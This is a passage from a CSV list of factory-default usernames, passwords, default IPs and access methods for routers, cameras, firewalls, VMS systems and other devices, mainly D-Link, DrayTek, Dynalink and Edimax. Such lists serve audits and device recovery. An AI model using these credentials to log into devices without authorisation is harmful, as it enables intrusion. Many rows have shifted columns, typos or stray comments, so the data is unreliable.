TAL,,,\ndigitalequipment,VMS,,Multi,SYSMAINT,SERVICE,,,\ndigitalequipment,VMS,,Multi,SYSMAINT,SYSMAINT,,,\ndigitalequipment,VMS,,Multi,SYSTEM,MANAGER,,,\ndigitalequipment,VMS,,Multi,SYSTEM,OPERATOR,,,\ndigitalequipment,VMS,,Multi,SYSTEM,SYSLIB,,,\ndigitalequipment,VMS,,Multi,SYSTEM,SYSTEM,,,\ndigitalequipment,VMS,,Multi,SYSTEST,UETP,,,\ndigitalequipment,VMS,,Multi,SYSTEST_CLIG,SYSTEST,,,\ndigitalequipment,VMS,,Multi,SYSTEST_CLIG,SYSTEST_CLIG,,,\ndigitalequipment,VMS,,Multi,TELEDEMO,TELEDEMO,,,\ndigitalequipment,VMS,,Multi,TEST,TEST,,,\ndigitalequipment,VMS,,Multi,UETP,UETP,,,\ndigitalequipment,VMS,,Multi,USER,PASSWORD,,,\ndigitalequipment,VMS,,Multi,USERP,USERP,,,\ndigitalequipment,VMS,,Multi,VAX,VAX,,,\ndigitalequipment,VMS,,Multi,VMS,VMS,,,\ndigitalequipment,decnet,,Multi,operator,admin,Guest,,\ndigium,AsteriskNOW,,,admin,password,,,\ndiscar,PMC30,,,SUPERVISOR,DISCAR,,,\ndiscar,PMC30,TODAS,Multi,SUPERVISOR,DISCAR,,,\ndivar,XF,,,admin,,,,\ndivar,XF,,,viewer,,,,\ndlink,,dir 655,,admin,blank,,,\ndlink,AC1200 Amplifi,gigabit model,192.168.0.1,,,Admin,,\ndlink,AC1200 Amplifi,rev.A,B,C,192.168.0.1,,Admin,\ndlink,AC1750 Amplifi,router,192.168.0.1,,,Admin,,\ndlink,AC1750 Wireless,rev.A,192.168.0.1,,,Admin,,\ndlink,AC1750 Wireless,rev.B,http://dlinkrouter.local.,,(see notes),Admin,The default password is printed on a card that comes with the router in this revision.,\ndlink,AC1900,router,192.168.0.1,,,Admin,,\ndlink,AC3150,router,192.168.0.1,,,Admin,,\ndlink,AC3200,router,192.168.0.1,,,Admin,,\ndlink,AC5300,router,192.168.0.1,,,Admin,,\ndlink,AC750 Wireless,router,192.168.0.1,admin,,Admin,,\ndlink,All Models,All Versions,192.168.0.1,,211cmw91765,user,,\ndlink,Cable/DSL Routers/Switches,,Multi,,admin,Admin,,\ndlink,D-704P,,Multi,admin,admin,Admin,,\ndlink,D-704P,rev b,Multi,admin,,Admin,,\ndlink,DAP-1150,,192.168.0.50,admin,,2012-01-08,,\ndlink,DAP-1155,1.00,http://192.160.0.50,admin,admin,,,\ndlink,DAP-1320,,http://dlinkap.local (see notes),Admin,,Admin,If there are multiple DAP-1320s,\ndlink,DAP-1650,,http://dlinkap.local. or http://192.168.0.50,Admin,,Admin,Wi-fi password will be the same as the router being extended,\ndlink,DCS-1000,,HTTP,,,admin,,\ndlink,DCS-2121,,,root,admin,,,\ndlink,DCS-2132L,,http://192.168.0.50,admin,,Admin,,\ndlink,DCS-2136L,camera,DHCP,admin,,Admin,,\ndlink,DCS-2310L,camera,DHCP,admin,,Admin,,\ndlink,DCS-2330L,,http,admin,,Admin,No default IP - use MyDlink to discover,\ndlink,DCS-2530L,camera,192.168.0.20,admin,,Admin,,\ndlink,DCS-2630L,camera,DHCP,admin,,Admin,,\ndlink,DCS-5020L,,http://192.168.0.20,admin,,Admin,,\ndlink,DCS-5025L,camera,192.168.0.20,admin,,Admin,,\ndlink,DCS-5030L,camera,192.168.0.20,admin,,Admin,,\ndlink,DCS-5222L,,http://192.168.0.20,admin,,Admin,,\ndlink,DCS-7010L,camera,DHCP,admin,,Admin,,\ndlink,DCS-930L,,http://192.168.0.20,admin,,Admin,,\ndlink,DCS-933L,,http://192.168.0.20,admin,,Admin,,\ndlink,DCS-935L,camera,10.255.255.1,admin,,Admin,,\ndlink,DCS-936L,camera,192.168.0.20,admin,,Admin,,\ndlink,DCS-942L,,http://192.168.0.20,admin,,Admin,,\ndlink,DCS-960L,camera,DHCP,admin,,Admin,,\ndlink,DFL-1100 firewall,,HTTP,admin,,Admin,,\ndlink,DFL-1600 firewall,,https://192.168.0.1,admin,admin,NetDefendOS Admin,,\ndlink,DFL-200 firewall,,HTTP,admin,,Admin,,\ndlink,DFL-200 firewall,,HTTP,admin,admin,Admin,,\ndlink,DFL-210 firewall,,https://192.168.0.1,admin,admin,NetDefendOS Admin,,\ndlink,DFL-300 firewall,,http://192.168.1.1,admin,admin,Admin,,\ndlink,DFL-700 firewall,,HTTP,admin,,Admin,,\ndlink,DFL-80 firewall,,http://192.168.1.1,admin,admin,Admin,,\ndlink,DFL-CP310 firewall,,http://my.firewall,admin,Management Interface Admin,,\ndlink,DFL-CP310 firewall,,http://my.firewall,admin,blank,Management Interface Admin,,\ndlink,DFL-CPG310 firewall,,http://my.firewall,admin,Management Interface Admin,,\ndlink,DFL-CPG310 firewall,,http://my.firewall,admin,blank,Management Interface Admin,,\ndlink,DFL-M510 firewall,,http://192.168.1.1,admin,admin,Admin,,\ndlink,DGL-4100,,http://192.168.0.1,,,Administration,,\ndlink,DGL-4100,,http://192.168.0.1,admin,,Administration,,\ndlink,DGL-4300,,http://192.168.0.1,,,Administration,,\ndlink,DGL-4300,,http://192.168.0.1,admin,,Administration,,\ndlink,DGL-4500,,http://192.168.0.1,,,Administration,,\ndlink,DGL-4500,,http://192.168.1.1,admin,admin,Administration,,\ndlink,DI-102,All,192.168.229.61,admin,,2012-01-08,,\ndlink,DI-106,,,administrator,@*nigU^D.ha,,winnt,\ndlink,DI-206 ISDN router,,,Admin,Admin,,1.*,\ndlink,DI-514 Router,,HTTP,admin,,,,\ndlink,DI-514,,Multi,user,,Admin,,\ndlink,DI-524,all version,http://192.168.0.1,,,admin,please di-524 user and password send me,\ndlink,DI-524,all,HTTP,admin,,Admin,http://192.168.0.1,\ndlink,DI-524,all,HTTP,user,,User,,\ndlink,DI-524,all,http://192.168.0.1,admin,,Admin,,\ndlink,DI-524UP,all,http://192.168.0.1,admin,,Admin,,\ndlink,DI-604,,HTTP,user,,Admin,,\ndlink,DI-604,1.62b+,HTTP,admin,,Admin,,\ndlink,DI-604,2.02,HTTP,admin,admin,Admin,,\ndlink,DI-604,rev a rev b rev c rev e,Multi,admin,,Admin,http://192.168.0.1,\ndlink,DI-614+,,HTTP,admin,,Admin,,\ndlink,DI-614+,,HTTP,admin,admin,Admin,,\ndlink,DI-614+,,HTTP,user,,User,,\ndlink,DI-614+,any,HTTP,admin,,Admin,all access :D,\ndlink,DI-614,,HTTP,admin,,Admin,,\ndlink,DI-624+,,HTTP,admin,,,,\ndlink,DI-624+,A3,HTTP,admin,admin,Admin,,\ndlink,DI-624,,http://192.168.0.1,Admin,,admin,,\ndlink,DI-624,,http://192.168.0.1,admin,password,admin,,\ndlink,DI-624,all,HTTP,User,,Admin,,\ndlink,DI-624M,,http://192.168.0.1,admin,,Administration,,\ndlink,DI-624S,,http://192.168.0.1,admin,,Administration,,\ndlink,DI-634M,,http://192.168.0.1,admin,,Administration,,\ndlink,DI-701,,Multi,admin,year2000,Admin,,\ndlink,DI-701,unknown,Multi,admin,year2000,Admin,,\ndlink,DI-704,,Multi,,admin,Admin,,\ndlink,DI-704,rev a,Multi,,admin,Admin,Cable/DSL Routers/Switches,\ndlink,DI-704P,,http://192.168.0.1,admin,,Administration,,\ndlink,DI-704UP,,http://192.168.0.1,admin,,Administration,,\ndlink,DI-707,,http://192.168.0.1,,admin,Admin,,\ndlink,DI-707P,,HTTP,admin,,Admin,,\ndlink,DI-707P,,http://192.168.0.1,admin,,Admin,,\ndlink,DI-711,,http://192.168.0.1,admin,,Admin,,\ndlink,DI-713,,http://192.168.0.1,,admin,Admin,,\ndlink,DI-713P,,http://192.168.0.1,,admin,Admin,,\ndlink,DI-714 Router,,HTTP,admin,,,,\ndlink,DI-714P+,,Multi,admin,,192.168.0.1,,\ndlink,DI-724GU,,http://192.168.0.1,admin,,Administration,,\ndlink,DI-724P+ Router,,HTTP,admin,,,,\ndlink,DI-724U,,http://192.168.0.1,admin,,Administration,,\ndlink,DI-754,,http://192.168.0.1,admin,,Admin,,\ndlink,DI-764,,HTTP,admin,,Admin,,\ndlink,DI-774,,http://192.168.0.1,admin,,Admin,,\ndlink,DI-784 Router,,HTTP,admin,,,,\ndlink,DI-804,v2.03,Multi,admin,,Admin,,\ndlink,DI-804HV,,http://192.168.0.1,admin,,Administration,,\ndlink,DI-804V,,http://192.168.0.1,admin,,Administration,,\ndlink,DI-808HV,,http://192.168.0.1,admin,,Administration,,\ndlink,DI-824VUP Airplus G Wireless VPN Router,,http://192.168.0.1,admin,,Administrator,,\ndlink,DI-824VUP+,,http://192.168.0.1,admin,password,Administrator,,\ndlink,DI-LB604,,http://192.168.0.1,admin,,Administration,,\ndlink,DIR-130,,http://192.168.0.1,admin,,administrator,,\ndlink,DIR-300,,192.168.0.1,admin,blank,administrator,,\ndlink,DIR-300,,telnet 192.168.0.1,root,,shell,,\ndlink,DIR-300,1,192.168.0.1,admin,admin,Admin,,\ndlink,DIR-300,ALL VERSION,http://192.168.0.1,admin,,,,\ndlink,DIR-320,,http://192.168.0.1,admin,,administrator,,\ndlink,DIR-330,,http://192.168.0.1,admin,,administrator,,\ndlink,DIR-412,,http://192.168.0.1,admin,,administrator,,\ndlink,DIR-450,,http://192.168.0.1,admin,,administrator,,\ndlink,DIR-451,,http://192.168.0.1,admin,,administrator,,\ndlink,DIR-501,,http://192.168.0,1,admin,,2012-01-08,\ndlink,DIR-505L,,http://dlinkrouter or http://dlinkrouter.local (Mac) or http://192.168.0.1,admin,,Admin,Default SSID and Wi-fi password are on the supplied info card.,\ndlink,DIR-515,,http://192.168.0,1,admin,,2012-01-08,\ndlink,DIR-600,3.02,http://192.168.0.1,admin,,,,\ndlink,DIR-600L,,http://192.168.0.1,admin,,,,\ndlink,DIR-601,all versons,http://,,,admin,,\ndlink,DIR-605,,http://192.168.0.1,admin,,,,\ndlink,DIR-605L,,http://192.168.0.1,admin,,,,\ndlink,DIR-615 ,3.01,192.168.01 ,,family,family,,\ndlink,DIR-615,,http://192.168.0.1,admin,,administrator,,\ndlink,DIR-615,1.0.0,http://192.168.0.1,admin,admin,admin,admin,\ndlink,DIR-615,1.10(I),http://192.168.0.1,Admin,,Admin,mantra88dotcom,\ndlink,DIR-615,2,,admin,admin,,,\ndlink,DIR-615,Ver.1.10(I),http://192.168.0.1). ,Admin,,Admin,mantra88dotcom,\ndlink,DIR-615,l1,http://192.168.0.1,Admin,,Admin,,\ndlink,DIR-625,,http://192.168.0.1,admin,,administrator,,\ndlink,DIR-628,,http://192.168.0.1,admin,,Admin,,\ndlink,DIR-635,,http://192.168.0.1,Admin,,Administration,,\ndlink,DIR-645,,http://192.168.0.1,Admin,,Admin,,\ndlink,DIR-651,,http://192.168.0.1,Admin,,Admin,,\ndlink,DIR-655,,,admin,blank,,,\ndlink,DIR-655,,http://192.168.0.1,admin,,Administration,,\ndlink,DIR-657,,http://192.168.0.1,Admin,,Admin,,\ndlink,DIR-660,,http://192.168.0.1,admin,,Administration,,\ndlink,DIR-665,,http://192.168.0.1,Admin,,Admin,,\ndlink,DIR-685,,http://192.168.0.1,Admin,,Admin,,\ndlink,DIR-810L,,http://dlinkrouter or http://dlinkrouter.local or http://192.168.0.1,admin,,Admin,Default SSID and Wi-fi password are on the supplied info card.,\ndlink,DIR-815,,http://192.168.0.1,Admin,,Admin,,\ndlink,DIR-816L,,http://dlinkrouter.local./ or http://192.168.0.1,admin,,Admin,Default SSID and Wi-fi password are on the supplied info card.,\ndlink,DIR-818LW,,http://dlinkrouter.local./ or http://192.168.0.1,admin,,Admin,Default SSID and Wi-fi password are on the supplied info card.,\ndlink,DIR-820L,,http://dlinkrouter.local./ or http://192.168.0.1,admin,,Admin,Default SSID and Wi-fi password are on the supplied info card.,\ndlink,DIR-822,rev.A,B,C,192.168.0.1,,Admin,\ndlink,DIR-825,,http://192.168.0.1,Admin,,Admin,,\ndlink,DIR-826L,,http://dlinkrouter or http://192.168.0.1,admin,,Admin,Default SSID and Wi-fi password are on the supplied info card.,\ndlink,DIR-827,,http://192.168.0.1,Admin,,Admin,,\ndlink,DIR-835,,http://192.168.0.1,Admin,,Admin,,\ndlink,DIR-842,gigabit router,192.168.0.1,,,Admin,,\ndlink,DIR-850L,,http://192.168.0.1 or http://dlinkrouter.local,(),,Admin,,\ndlink,DIR-855,,http://192.168.0.1,admin,,Administration,,\ndlink,DIR-857,,http://192.168.0.1,Admin,,Admin,,\ndlink,DIR-859,router,192.168.0.1,,,Admin,,\ndlink,DIR-868L,,http://192.168.0.1 or http://dlinkrouter.local,(),,Admin,,\ndlink,DIR-880L,,http://192.168.0.1 or http://dlinkrouter.local,(),,Admin,,\ndlink,DIR-890L,,http://192.168.0.1,Admin,,Admin,,\ndlink,DIR-895L,router,192.168.0.1,,,Admin,,\ndlink,DKVM-16 16-port keyboard/video/mouse switch,,,,0,,,\ndlink,DKVM-16 16-port keyboard/video/mouse switch,,,,00000000,,,\ndlink,DNR-202L,Network Video Recorder,DHCP,admin,(configured in setup),Admin,,\ndlink,DNR-322L,Network Video Recorder,DHCP,admin,,Admin,,\ndlink,DSA-3100,All,http://192.168.0.40,admin,admin,Admin,,\ndlink,DSA-3100,All,http://192.168.0.40,manager,manager,User Management Options,,\ndlink,DSA-3200,All,http://192.168.0.40,admin,admin,Admin,,\ndlink,DSA-5100,All,http://192.168.0.40,admin,admin,Admin,,\ndlink,DSA-5100,All,http://192.168.0.40,manager,manager,User Management Options,,\ndlink,DSL Router,,,root,admin,Administrator,,\ndlink,DSL-2640B,DSL-2640B,http://192.168.1.1/,,,Telekom,,\ndlink,DSL-2640T,1.00(1),192.168.1.1,88612421,2421D,ADMIN,ADMIN,\ndlink,DSL-2640T,1.00(1),192.168.I.I,88612421,2421D,ADMIN,ADMIN,\ndlink,DSL-2642B,All,192.168.1.1,admin,admin,Admin,,\ndlink,DSL-2730B,All,192.168.1.1,admin,admin,Admin,,\ndlink,DSL-2730U,C1,192.168.1.1,admin,admin,admin,forget my password and username,\ndlink,DSL-2750B,All,192.168.1.1,admin,admin,Admin,,\ndlink,DSL-2750U,All,192.168.1.1,admin,admin,Admin,,\ndlink,DSL-300,?,Telnet,,private,,,\ndlink,DSL-300G+,7.1.0.30,Telnet,,private,admin?,,\ndlink,DSL-300g+,Teo,HTTP,admin,admin,Admin,,\ndlink,DSL-300g+,Teo,Telnet,,private,Admin,,\ndlink,DSL-302G,,Multi,admin,admin,Admin,,\ndlink,DSL-500,,Multi,admin,admin,Admin,,\ndlink,DSL-502T,,http://10.1.1.1,admin,admin,Admin,,\ndlink,DSL-504,,HTTP,,private,Admin,,\ndlink,DSL-504G,,http://10.1.1.1,admin,admin,Admin,also try IP 192.168.1.254,\ndlink,DSL-504T,,http://10.1.1.1,admin,admin,Admin,,\ndlink,DSL-526B,All,192.168.1.1,admin,admin,Admin,,\ndlink,DSL-604+,,,admin,admin,Admin,,\ndlink,DSL-604T,,10.1.1.1,admin,admin,Admin,,\ndlink,DSL-G604T,,http://10.1.1.1,admin,admin,Admin,,\ndlink,DSL-G624T,?,? via WAN ...,root,admin,Admin,,\ndlink,DSL-G664T,A1,HTTP,admin,admin,Admin,SSID : G664T_WIRELESS,\ndlink,DSL-G804V,,192.168.1.1,admin,admin,Admin,,\ndlink,DSL500G,,Multi,admin,admin,Admin,,\ndlink,DSR-1000,All,http://192.168.10.1,admin,admin,Admin,,\ndlink,DSR-1000N,All,http://192.168.10.1,admin,admin,Admin,,\ndlink,DSR-250N,All,http://192.168.10.1,admin,admin,Admin,,\ndlink,DSR-500,All,http://192.168.10.1,admin,admin,Admin,,\ndlink,DSR-500N,All,http://192.168.10.1,admin,admin,Admin,,\ndlink,DVA-G3304A,,10.1.1.1,admin,admin,Admin,,\ndlink,DVA-G3670B,,10.1.1.1,admin,admin,Admin,,\ndlink,DVG-1402S,,10.1.1.1,admin,admin,Admin,,\ndlink,DVG-2001S,,10.1.1.1,admin,admin,Admin,,\ndlink,DVG-2101SP,,193.168.1.150,admin,,Admin,,\ndlink,DVG-G1402S,,192.168.15.1,admin,admin,Admin,,\ndlink,DWC-1000,Rev.A and B,192.168.0.1,admin,admin,Admin,,\ndlink,DWL-1000+,,HTTP,admin,,Admin,,\ndlink,DWL-1000,,HTTP,admin,,Admin,,\ndlink,DWL-1000AP+,,http://192.168.0.50,admin,,Admin,,\ndlink,DWL-1700AP,,http://192.168.0.50:2000,admin,root,,,\ndlink,DWL-1750,,http://192.168.0.50:2000,admin,root,,,\ndlink,DWL-2000AP+,1.13,HTTP,admin,,Admin,Wireless Access Point,\ndlink,DWL-2100AP,,AP Mgr or D-View Module or http://192.168.0.50,admin,,,,\ndlink,DWL-210AP,1.03,Wireless,admin,,,,\ndlink,DWL-2200AP,,AP Mgr or D-View Module or http://192.168.0.50,admin,,,,\ndlink,DWL-2210AP,,http://192.168.0.50,admin,admin,,,\ndlink,DWL-2700AP,,MIB or AP Mgr or D-View Module or http://192.168.0.50,admin,,,,\ndlink,DWL-3150,,http://192.168.0.30,admin,,Administration,default SSID is 'dlink',\ndlink,DWL-3200AP,,AP Mgr or D-View Module or http://192.168.0.50,admin,,,,\ndlink,DWL-3200AP,,http://192.168.1.199,,,admin,,\ndlink,DWL-5000AP,,http://192.168.0.50,admin,,,,\ndlink,DWL-6000AP,Rev.A and Rev.B,multi interfaces incl. http://192.168.0.50,admin,,,,\ndlink,DWL-614+,2.03,HTTP,admin,,Admin,,\ndlink,DWL-614+,rev a rev b,HTTP,admin,,Admin,http://192.168.0.1,\ndlink,DWL-7000AP,,http://192.168.0.50 or AP Mgr,admin,,,,\ndlink,DWL-700AP,,http://192.168.0.50,admin,,Admin,,\ndlink,DWL-7100AP,,http://192.168.0.50,admin,,Administration,,\ndlink,DWL-7200AP,,http://192.168.0.50,admin,,Administration,,\ndlink,DWL-7700AP,Rev. A and Rev. B,mutli console,admin,,Administration,default IP 192.168.0.50,\ndlink,DWL-810+,,http://192.168.0.30,admin,,Admin,,\ndlink,DWL-810,,http://192.168.0.30,admin,,Admin,,\ndlink,DWL-8200AP,,multi console,admin,,,default IP 192.160.0.50,\ndlink,DWL-8200AP,,multi console,admin,,,default IP 192.168.0.50 (/! Previous indication in the page is false!),\ndlink,DWL-8200AP,,multi console,admin,,,default IP 192.168.0.50 (/!\\ Previous indication in the page is false!),\ndlink,DWL-900+,,HTTP,admin,,Admin,,\ndlink,DWL-900,,,admin,public,Admin,,\ndlink,DWL-900AP+,,,Admin,1970,,,\ndlink,DWL-900AP+,rev a rev b rev c,HTTP,admin,,Admin,http://192.168.0.50,\ndlink,DWL-900AP,,Multi,,public,Admin,,\ndlink,DWL-900AP,,Multi,admin,public,Admin,,\ndlink,DWL-900AP,,USB/SNMP,,public,Admin,default IP 192.168.0.20,\ndlink,DWL-AG700AP,,http://192.168.0.50,admin,,Administration,,\ndlink,DWL-G700AP,,HTTP,admin,,,,\ndlink,DWL-G700AP,,http://192.168.0.50/,admin,olinda,,,\ndlink,DWL-G710,,http://192.168.0.30,admin,,Administration,,\ndlink,DWL-G730AP,,http://192.168.0.30,admin,,Administration,,\ndlink,DWL-G800AP,,http://192.168.0.30,admin,,Administration,,\ndlink,DWL-G810,,192.168.1.30,admin,,Admin,,\ndlink,DWL-G820,,http://192.168.0.35,admin,,Administration,,\ndlink,DWS-3160-24PC,,RS-232 console,admin,admin,Admin,Default IP is 10.90.90.90,\ndlink,DWS-3600AP,,10.90.90.90,admin,,Admin,Also has RS-232 console admin,\ndlink,DWS-4026,,10.90.90.90,admin,,Admin,Also has RS-232 console admin,\ndlink,DWS-6600AP,,10.90.90.90,admin,,Admin,Also has RS-232 console admin,\ndlink,DWS-8600AP,,10.90.90.90,admin,,Admin,Also has RS-232 console admin,\ndlink,EBR-2310,,http://192.168.0.1,admin,,Administration,,\ndlink,KR-1,All,http://192.168.0.1,admin,,Admin,,\ndlink,N300,rev.A,http://192.168.0.1,admin,,,,\ndlink,TM-G5240,All,http://192.168.0.1,,admin,Admin,,\ndlink,WBR-1310,,http://192.168.0.1,admin,,Administration,,\ndlink,WBR-1310,2.0,192.168.0.1,volcom75,1987197500,,problem speed low,\ndlink,WBR-2310,,http://192.168.0.1,admin,,Administration,,\ndlink,WBR-2310,a1 1.02,192.168.0.1,D Link 25,,,,\ndlink,WBR-2310,revB,http://192.168.0.1,admin,,Administration,,\ndlink,Windows XP,Windows XP,192.168.0.1,admin,password,admin,amdin,\ndlink,hubs/switches,,Telnet,D-Link,D-Link,,,\ndlink,wbr-2310,a1 1.02,192.168.0.1,D Link 25,,,,\ndlink,windows xp,all,192.168.0.1,admin,,,,\ndovado,Tiny,,192.168.0.1,admin,password,Admin,,\ndovado,WRG (Wireless Residential Gateway),,192.168.0.1,admin,password,Admin,,\ndraytek,Vigor 120,,192.168.1.1,,,Admin,,\ndraytek,Vigor 2110,,192.168.1.1,admin,admin,Admin,,\ndraytek,Vigor 2130Vn,,192.168.1.1,admin,admin,Admin,,\ndraytek,Vigor 2200 USB,,,admin,,Admin,,\ndraytek,Vigor 2500,,192.168.1.1,admin,admin,Admin,,\ndraytek,Vigor 2500V,,192.168.1.1,admin,admin,Admin,,\ndraytek,Vigor 2600 Plus Series,Annex A,HTTP,admin,,Admin,,\ndraytek,Vigor 2600,,HTTP,admin,,Admin,,\ndraytek,Vigor 2600G,,192.168.1.1,,,Admin,,\ndraytek,Vigor 2600Ge,,192.168.1.1,admin,,Admin,,\ndraytek,Vigor 2700G,,192.168.1.1,admin,,Admin,,\ndraytek,Vigor 2700Ge,,192.168.1.1,admin,,Admin,,\ndraytek,Vigor 2700VG,,192.168.1.1,,admin,Admin,,\ndraytek,Vigor 2700e,,192.168.1.1,,,Admin,,\ndraytek,Vigor 2710,,192.168.1.1,admin,admin,Admin,,\ndraytek,Vigor 2710Vn,,192.168.1.1,admin,admin,Admin,default username is reported to be unchangeable,\ndraytek,Vigor 2710n,,192.168.1.1,admin,admin,Admin,,\ndraytek,Vigor 2800,,192.168.1.1,,,Admin,,\ndraytek,Vigor 2800VG,,192.168.1.1,admin,,Admin,,\ndraytek,Vigor 2820,,192.168.1.1,admin,,Admin,,\ndraytek,Vigor 2820G,,192.168.1.1,admin,,Admin,,\ndraytek,Vigor 2820Vn,,192.168.1.1,admin,admin,Admin,,\ndraytek,Vigor 2820n,,192.168.1.1,admin,,Admin,,\ndraytek,Vigor 2900+,,HTTP,admin,admin,Admin,,\ndraytek,Vigor 2900,,192.168.1.1,,,Admin,,\ndraytek,Vigor 2900G,,192.168.1.1,admin,,Admin,,\ndraytek,Vigor 2900V,,192.168.1.1,,,Admin,,\ndraytek,Vigor 2900VG,,192.168.1.1,draytek,,Admin,,\ndraytek,Vigor 2910,,192.168.1.1,admin,,Admin,,\ndraytek,Vigor 2910G,,192.168.1.1,admin,,Admin,,\ndraytek,Vigor 2910VG,,192.168.1.1,,,Admin,,\ndraytek,Vigor,all,HTTP,admin,admin,Admin,,\ndreambox,All models,all versions,http, telnet,root,dreambox,,\ndreambox,All models,all versions,http,telnet,root,dreambox,gives access to a busybox allowing to control the box using basic unix commands embedded into busybox,\ndrupal.org,Drupal,,administrator,admin,admin,,,\ndupont,Digital Water Proofer,,,root,par0t,,,\ndynalink,RTA020,,,admin,private,,,\ndynalink,RTA020,,Admin,admin,private,,,\ndynalink,RTA020,,Multi,admin,private,Admin,,\ndynalink,RTA100+,,192.168.1.1,admin,admin,Admin,,\ndynalink,RTA100+,,192.168.1.1,admin,root,Admin,,\ndynalink,RTA100+,,192.168.1.1,root,root,Root,,\ndynalink,RTA100,,192.168.1.1,admin,admin,Admin,,\ndynalink,RTA100,,192.168.1.1,root,root,Root,,\ndynalink,RTA1025W,,192.168.1.1,admin,admin,Admin,,\ndynalink,RTA1025W,,console,http//192.168.1.1,admin,admin,,\ndynalink,RTA1030W,,192.168.1.1,admin,admin,Admin,,\ndynalink,RTA1046VW,,192.168.1.1,admin,admin,Admin,,\ndynalink,RTA1320,,192.168.1.1,admin,admin,Admin,,\ndynalink,RTA1320,,console,http//192.168.1.1,admin,admin,,\ndynalink,RTA1335,,192.168.1.1,admin,admin,Admin,,\ndynalink,RTA1335,,console,http//192.168.1.1,admin,admin,,\ndynalink,RTA220,,192.168.1.1,admin,admin,Admin,,\ndynalink,RTA230,,,userNotUsed,userNotU,,,\ndynalink,RTA230,,,userNotUsed,userNotU,Admin,,\ndynalink,RTA230,,192.168.1.1,admin,admin,Admin,,\ndynalink,RTA230,,Multi,admin,admin,Admin,,\ndynalink,RTA300,,192.168.1.1,admin,admin,Admin,,\ndynalink,RTA300W,,192.168.1.1,admin,admin,Admin,,\ndynalink,RTA770,,192.168.1.1,admin,admin,Admin,,\ndynalink,RTA770W,,192.168.1.1,admin,admin,Admin,,\ndynamode,BR-6004,,http,guest,guest,Standard admin access,,\ndynix library systems,Dynix,,,LIBRARY,,,,\ndynix library systems,Dynix,,,SETUP,,,,\ndynix library systems,Dynix,,,circ,,,,\ndynix library systems,Dynix,,,circ,,,,\ndynix library systems,Dynix,,Admin,SETUP,,,,\ndynix library systems,Dynix,,User,LIBRARY,,,,\ndynixlibrarysystems,Dynix,,Multi,LIBRARY,,User,,\ndynixlibrarysystems,Dynix,,Multi,SETUP,,Admin,,\ndynixlibrarysystems,Dynix,,Multi,circ,(social security number),User,,\ne-tech,Router,,Admin,,admin,,,\neaton,ePDU,,,admin,admin,,,\necheloncorporation,i.LON Multiple,,,ilon,ilon,,,\necon,Econ DSL Router,,Router,admin,epicrouter,Admin,DSL Router,\nedimax,.,,,admin,1234,,,\nedimax,.,,Multi,admin,1234,,,\nedimax,6114wg,1.83,192.168.2.1,admin,1234,,,\nedimax,7205APL,,,guest,1234,,,\nedimax,7205APL,,,guest,1234,Guest - allows backup of config.bin,attacker can gain all passwords,\nedimax,AR-6004,,,admin,1234,,,\nedimax,AR-7024,,,admin,epicrouter,,,\nedimax,AR-7024WG,,Default IP: 10.0.0.2,admin,epicrouter,Admin,,\nedimax,AR-7024Wg,,Admin,admin,epicrouter,,,\nedimax,AR-7064Sg+A,,Default IP: 10.0.0.2,admin,epicrouter,Admin,,\nedimax,AR-7084A,,192.168.2.1,admin,1234,Admin,,\nedimax,AR-7084gA,,ipod,admin/1234,,,,\nedimax,AR-7084gA,3.0A,http://192.168.2.1,admin,1234,Admin,,\nedimax,AR728WnA19Mc04792,v1.0,192.168.2.1,admin,1234,1234,,\nedimax,BR 4000+ Router,,,admin,password,,,\nedimax,BR 4000+ Router,all,HTTP,admin,password,,,\nedimax,BR-6204,wg,http://192.168.2.1,admin,1234,admin,,\nedimax,BR-6204WG,,Default IP: 192.168.2.1,admin,1234,,,\nedimax,BR-6524K,,Default IP: 192.168.2.1,admin,1234,,,\nedimax,BR-6524WP,,Default IP: 192.168.2.1,admin,1234,,,\nedimax,BR-6524n,,Default IP: 192.168.2.1,admin,1234,,,\nedimax,BR-7209WG,,Default IP: 192.168.2.1,admin,1234,,,\nedimax,Broadband Router,Hardware: Rev A. Boot Code: 1.0 Runtime Code 2.63,HTTP,admin,1234,Admin,,\nedimax,ES-5224RXM,,Multi,admin,123,Admin,,\nedimax,EW-7205APL,Firmware release 2.40a-00,Multi,guest,,Admin,,\nedimax,EW-7206apg,,,admin,1234,,,\nedimax,LT-6408n,3G-6408n,all versions,http://192.168.2.1/index.asp,admin,1234,web administration,\nedimax,Wireless ADSL Router,AR-7024,Multi,admin,epicrouter,Admin,,\nedimax,br-6204,wg,http://192.168.2.1,admin,1234,admin,,\nefficient networks,5851 SDSL Router,,,,hs7mwxkk,,,\nefficient networks,5851 SDSL Router,,Admin,,hs7mwxkk,,,\nefficient networks,EN 5861,,,login,admin,,,\nefficient networks,EN 5861,,Admin,login,admin,,,\nefficient networks,Speedstream 5711,,Admin,,4getme2,,,\nefficient networks,Speedstream 5711,,Teledanmark version (only .dk),,4getme2,,,\nefficient,5871 DSL Router,,Admin,login,admin,,,\nefficient,5871 DSL Router,,v 5.3.3-0,login,admin,,,\nefficient,Speedstream DSL,,,,admin,,,\nefficient,Speedstream DSL,,Admin,,admin,,,\nefficientnetworks,5800 Class DSL Routers,all,Multi,login,admin,Admin,,\nefficientnetworks,5851 SDSL Router,N/A,Console,,hs7mwxkk,Admin,On some Covad Routers,\nefficientnetworks,5851,,Telnet,login,password,Admin,might be all 5800 series,\nefficientnetworks,5871 DSL Router,v 5.3.3-0,Multi,login,admin,Admin,,\nefficientnetworks,5871 DSL Router,v 5.3.3-0,Multi,login,admin,Admin,This is for access to HTTP admin console.,\nefficientnetworks,EN 5861,,Telnet,login,admin,Admin,,\nefficientnetworks,Speedstream DSL,,Telnet,,admin,Admin,,\nefficientnetworks,Speedstream,5200,http/telnet,,,,Default IP 10.0.0.1/8,\nefficientnetworks,Speedstream,5600,http/telnet,,,,Default IP 10.0.0.1/8,\nefficientnetworks,Speedstream,5711 Teledanmark version (only .dk),Console,,4getme2,Admin,,\nefficientnetworks,Speedstream,57xx series,http/telnet,login,admin,,Default IP 192.168.254.254/24,\nefficientnetworks,Speedstream,59xx series,http/telnet,login,admin,,Default IP 192.168.254.254/24,\nefficientnetworks,Speedstream,various,http/telnet,superuser,admin,Admin,,\nefficinet networks,5800 Class DSL Routers,,Admin,login,admin,,,\nefficinet networks,5800 Class DSL Routers,,all,login,admin,,,\negenera,all models,all version,http, ssh, console,root,root,\negenera,all models,all version,http,ssh,console,root,root,\nektron,CMS400.NET,,,builtin,builtin,,,\nelron,Firewall,,,(hostname/ipaddress),sysadmin,,,\nelronsoftware,Elron Firewall,2.5c,,hostname/ip address,sysadmin,Admin,,\nelsa,LANCom Office ISDN Router,,800/1000/1100,,,,,\nelsa,LANCom Office ISDN 